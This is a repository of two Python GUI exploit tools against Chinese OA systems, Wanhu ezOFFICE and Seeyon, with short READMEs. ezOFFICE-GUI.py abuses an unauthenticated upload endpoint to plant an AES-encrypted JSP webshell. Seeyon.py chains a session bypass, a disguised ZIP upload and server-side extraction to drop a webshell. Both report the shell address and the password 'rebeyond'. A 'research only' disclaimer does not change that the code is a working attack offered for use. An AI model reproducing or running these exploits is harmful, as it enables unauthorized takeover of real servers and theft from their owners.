├── Seeyon ├── Code │ ├── 1 │ └── Shell.zip ├── README.md └── Seeyon.py ├── ezOFFICE ├── README.md └── ezOFFICE-GUI.py └── README.md /Seeyon/Code/1: -------------------------------------------------------------------------------- 1 | 1 2 | -------------------------------------------------------------------------------- /Seeyon/Code/Shell.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XiaoLi996/OA-EXP/HEAD/Seeyon/Code/Shell.zip -------------------------------------------------------------------------------- /Seeyon/README.md: -------------------------------------------------------------------------------- 1 | # ezOFFICE 2 | ### 使用方法: 3 | `python3 Seeyon.py` 4 | ### 屏幕截图: 5 | ![GUI](https://xiaobai-src.oss-cn-hangzhou.aliyuncs.com/Github/Seeyon/Seeyon.png) 6 | ## 本人写这个脚本仅供学习研究使用,禁止利用此工具非法攻击他人网站。本人不承担任何后果 7 | -------------------------------------------------------------------------------- /ezOFFICE/README.md: -------------------------------------------------------------------------------- 1 | # ezOFFICE 2 | ### 使用方法: 3 | `python3 ezOFFICE-GUI.py` 4 | ### 屏幕截图: 5 | ![GUI](https://xiaobai-src.oss-cn-hangzhou.aliyuncs.com/Github/ezOFFICE/ezOFFICE-GUI.png) 6 | ## 本人写这个脚本仅供学习研究使用,禁止利用此工具非法攻击他人网站。本人不承担任何后果 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OA-EXP 2 | ### 万户屏幕截图: 3 | ![GUI](https://xiaobai-src.oss-cn-hangzhou.aliyuncs.com/Github/ezOFFICE/ezOFFICE-GUI.png) 4 | 5 | ### 致远屏幕截图: 6 | ![GUI](https://xiaobai-src.oss-cn-hangzhou.aliyuncs.com/Github/Seeyon/Seeyon.png) 7 | ## 本人写这个脚本仅供学习研究使用,禁止利用此工具非法攻击他人网站。本人不承担任何后果 8 | -------------------------------------------------------------------------------- /ezOFFICE/ezOFFICE-GUI.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from tkinter import * 4 | import time 5 | import urllib3 6 | urllib3.disable_warnings() 7 | import requests 8 | import re 9 | LOG_LINE_NUM = 0 10 | 11 | class MY_GUI(): 12 | def __init__(self, init_window_name): 13 | self.init_window_name = init_window_name 14 | 15 | # 设置窗口 16 | def set_init_window(self): 17 | self.init_window_name.title("万户OA漏洞利用工具 By:XiaoBai") 18 | self.init_window_name.geometry('800x400+10+10') 19 | # 标签 20 | self.init_data_label = Label(self.init_window_name, text="网址") 21 | self.init_data_label.grid(row=0, column=0) 22 | self.result_data_label = Label(self.init_window_name, text="结果") 23 | self.result_data_label.grid(row=0, column=12) 24 | self.log_label = Label(self.init_window_name, text="日志") 25 | self.log_label.grid(row=12, column=0) 26 | # 文本框 27 | self.init_data_Text = Text(self.init_window_name, width=50, height=5) 28 | self.init_data_Text.grid(row=1, column=0, rowspan=10, columnspan=10) 29 | self.result_data_Text = Text(self.init_window_name, width=50, height=18) 30 | self.result_data_Text.grid(row=1, column=12, rowspan=15, columnspan=10) 31 | self.log_data_Text = Text(self.init_window_name, width=50, height=10) 32 | self.log_data_Text.grid(row=13, column=0, columnspan=10) 33 | # 按钮 34 | self.exp_button = Button(self.init_window_name, text="Run", bg="lightblue", width=10, 35 | command=self.exp) 36 | self.exp_button.grid(row=1, column=10) 37 | 38 | # 功能函数 39 | def exp(self): 40 | url = self.init_data_Text.get(1.0, END).strip().replace("\n", "") 41 | target_url = url + "/defaultroot/upload/fileUpload.controller" 42 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0", 43 | "Content-Type": "multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0", 44 | "Connection": "Keep-Alive"} 45 | data = "--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0\r\nContent-Disposition: form-data; name=\"file\"; " \ 46 | "filename=\"123.jsp\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: " \ 47 | "binary\r\n\r\n<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends " \ 48 | "ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0," \ 49 | "b.length);}}%><%if (request.getMethod().equals(\"POST\")){String " \ 50 | "k=\"e45e329feb5d925b\";/*......tas9er*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(" \ 51 | "\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(" \ 52 | "c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance(" \ 53 | ").equals(pageContext);}%>\r\n--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--" # 这里修改上传的webshell 54 | try: 55 | r = requests.post(target_url, headers=headers, data=data, timeout=5) 56 | # print(r.text) 57 | if "success" in r.text: 58 | pattern = re.compile(r'"data":"(.*)"}') 59 | filename = pattern.findall(r.text)[0] 60 | shell_url = url + "/defaultroot/upload/html/" + filename 61 | xxx = "[+]存在漏洞! 地址在:" + shell_url + ",密码为rebeyond" 62 | self.result_data_Text.insert(1.0, xxx) 63 | self.write_log_to_Text("INFO: " + url + " success") 64 | except Exception as e: 65 | self.result_data_Text.insert(1.0, "[-]" + url + "不存在漏洞! \n") 66 | self.write_log_to_Text("INFO: " + url + " failed") 67 | 68 | # 获取当前时间 69 | def get_current_time(self): 70 | current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) 71 | return current_time 72 | 73 | # 日志动态打印 74 | def write_log_to_Text(self, logmsg): 75 | global LOG_LINE_NUM 76 | current_time = self.get_current_time() 77 | logmsg_in = str(current_time) + " " + str(logmsg) + "\n" # 换行 78 | if LOG_LINE_NUM <= 7: 79 | self.log_data_Text.insert(END, logmsg_in) 80 | LOG_LINE_NUM = LOG_LINE_NUM + 1 81 | else: 82 | self.log_data_Text.delete(1.0, 2.0) 83 | self.log_data_Text.insert(END, logmsg_in) 84 | 85 | 86 | def gui_start(): 87 | init_window = Tk() # 实例化出一个父窗口 88 | ZMJ_PORTAL = MY_GUI(init_window) 89 | # 设置根窗口默认属性 90 | ZMJ_PORTAL.set_init_window() 91 | init_window.mainloop() # 父窗口进入事件循环,可以理解为保持窗口运行,否则界面不展示 92 | 93 | gui_start() 94 | -------------------------------------------------------------------------------- /Seeyon/Seeyon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from tkinter import * 4 | import requests 5 | import sys 6 | import random 7 | import time 8 | import re 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 10 | from os.path import abspath 11 | from inspect import getsourcefile 12 | 13 | abspath(getsourcefile(lambda: 0)) 14 | LOG_LINE_NUM = 0 15 | 16 | 17 | class MY_GUI(): 18 | def __init__(self, init_window_name): 19 | self.init_window_name = init_window_name 20 | 21 | # 设置窗口 22 | def set_init_window(self): 23 | self.init_window_name.title("致远OA漏洞利用工具 By:XiaoBai") 24 | self.init_window_name.geometry('800x400+10+10') 25 | # 标签 26 | self.init_data_label = Label(self.init_window_name, text="网址") 27 | self.init_data_label.grid(row=0, column=0) 28 | self.result_data_label = Label(self.init_window_name, text="结果") 29 | self.result_data_label.grid(row=0, column=0) 30 | self.log_label = Label(self.init_window_name, text="日志") 31 | self.log_label.grid(row=12, column=0) 32 | # 文本框 33 | self.init_data_Text = Text(self.init_window_name, width=50, height=5) 34 | self.init_data_Text.grid(row=1, column=0, rowspan=10, columnspan=10) 35 | self.result_data_Text = Text(self.init_window_name, width=50, height=18) 36 | self.result_data_Text.grid(row=1, column=12, rowspan=15, columnspan=10) 37 | self.log_data_Text = Text(self.init_window_name, width=50, height=10) 38 | self.log_data_Text.grid(row=13, column=0, columnspan=10) 39 | # 按钮 40 | self.exp_button = Button(self.init_window_name, text="Run", bg="lightblue", width=10, 41 | command=self.exp) 42 | self.exp_button.grid(row=1, column=10) 43 | 44 | # 功能函数 45 | def exp(self): 46 | target_url = self.init_data_Text.get(1.0, END).strip().replace("\n", "") 47 | vuln_url = target_url + "/seeyon/thirdpartyController.do" 48 | headers = { 49 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " 50 | "Chrome/86.0.4240.111 Safari/537.36", 51 | "Content-Type": "application/x-www-form-urlencoded", 52 | } 53 | data = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04" \ 54 | "+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1 " 55 | try: 56 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 57 | response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) 58 | if response.status_code == 200 and "a8genius.do" in response.text and 'set-cookie' in str( 59 | response.headers).lower(): 60 | cookies = response.cookies 61 | cookies = requests.utils.dict_from_cookiejar(cookies) 62 | cookie = cookies['JSESSIONID'] 63 | print("[+] 目标 {} 正在上传压缩包文件.... \n[+] Cookie: {} ".format(target_url, cookie)) 64 | targeturl = target_url + '/seeyon/fileUpload.do?method=processUpload' 65 | files = [('file1', ('360icon.png', open('Code/Shell.zip', 'rb'), 'image/png'))] 66 | headers = {'Cookie': "JSESSIONID=%s" % cookie} 67 | data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0', 68 | 'isEncrypt': "0"} 69 | response = requests.post(url=targeturl, files=files, data=data, headers=headers, timeout=60, 70 | verify=False) 71 | reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'', response.text, re.I) 72 | if len(reg) == 0: 73 | sys.exit("上传文件失败") 74 | vuln_url = target_url + '/seeyon/ajax.do' 75 | datestr = time.strftime('%Y-%m-%d') 76 | post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment' \ 77 | '&arguments' \ 78 | '=%5B0%2C%22' + datestr + '%22%2C%22' + \ 79 | reg[0] + '%22%5D' 80 | headers['Content-Type'] = "application/x-www-form-urlencoded" 81 | print("[*] 目标 {} 正在解压文件.... ".format(target_url)) 82 | try: 83 | response = requests.post(vuln_url, data=post, headers=headers, timeout=60, verify=False) 84 | if response.status_code == 500: 85 | shell_url = target_url + "/seeyon/common/designer/pageLayout/code.jsp" 86 | print("[+] 目标 {} 解压文件成功.... ".format(target_url)) 87 | print("[+] 默认Webshell地址: {}/seeyon/common/designer/pageLayout/code.jsp ".format( 88 | target_url)) 89 | print("[+] 默认密码: rebeyond ".format(target_url)) 90 | print("[+] 如果目标webshell无法访问,请更换 Shell.zip 中的木马名称 ".format(target_url)) 91 | self.result_data_Text.insert(1.0, "[+]存在漏洞! Shell地址:" + shell_url + ",密码为rebeyond \n") 92 | self.write_log_to_Text("INFO: " + target_url + " success") 93 | else: 94 | print("[-] 目标 {} 不存在漏洞 ".format(target_url)) 95 | self.result_data_Text.insert(1.0, "[-]" + target_url + "不存在漏洞! \n") 96 | self.write_log_to_Text("INFO: " + target_url + " failed") 97 | except Exception as e: 98 | print("[-] 目标 {} 请求失败 ".format(target_url), e) 99 | self.result_data_Text.insert(1.0, "[-]" + target_url + "无法连接! \n") 100 | self.write_log_to_Text("INFO: " + target_url + " failed") 101 | else: 102 | print("[-] 目标 {} 不存在漏洞 ".format(target_url)) 103 | self.result_data_Text.insert(1.0, "[-]" + target_url + "不存在漏洞! \n") 104 | self.write_log_to_Text("INFO: " + target_url + " failed") 105 | except Exception as e: 106 | print("[-] 目标 {} 请求失败 ".format(target_url), e) 107 | self.result_data_Text.insert(1.0, "[-]" + target_url + "无法连接! \n") 108 | self.write_log_to_Text("INFO: " + target_url + " failed") 109 | 110 | # 获取当前时间 111 | def get_current_time(self): 112 | current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) 113 | return current_time 114 | 115 | # 日志动态打印 116 | def write_log_to_Text(self, logmsg): 117 | global LOG_LINE_NUM 118 | current_time = self.get_current_time() 119 | logmsg_in = str(current_time) + " " + str(logmsg) + "\n" # 换行 120 | if LOG_LINE_NUM <= 7: 121 | self.log_data_Text.insert(END, logmsg_in) 122 | LOG_LINE_NUM = LOG_LINE_NUM + 1 123 | else: 124 | self.log_data_Text.delete(1.0, 2.0) 125 | self.log_data_Text.insert(END, logmsg_in) 126 | 127 | 128 | def gui_start(): 129 | init_window = Tk() # 实例化出一个父窗口 130 | ZMJ_PORTAL = MY_GUI(init_window) 131 | # 设置根窗口默认属性 132 | ZMJ_PORTAL.set_init_window() 133 | init_window.mainloop() # 父窗口进入事件循环,可以理解为保持窗口运行,否则界面不展示 134 | 135 | 136 | gui_start() 137 | --------------------------------------------------------------------------------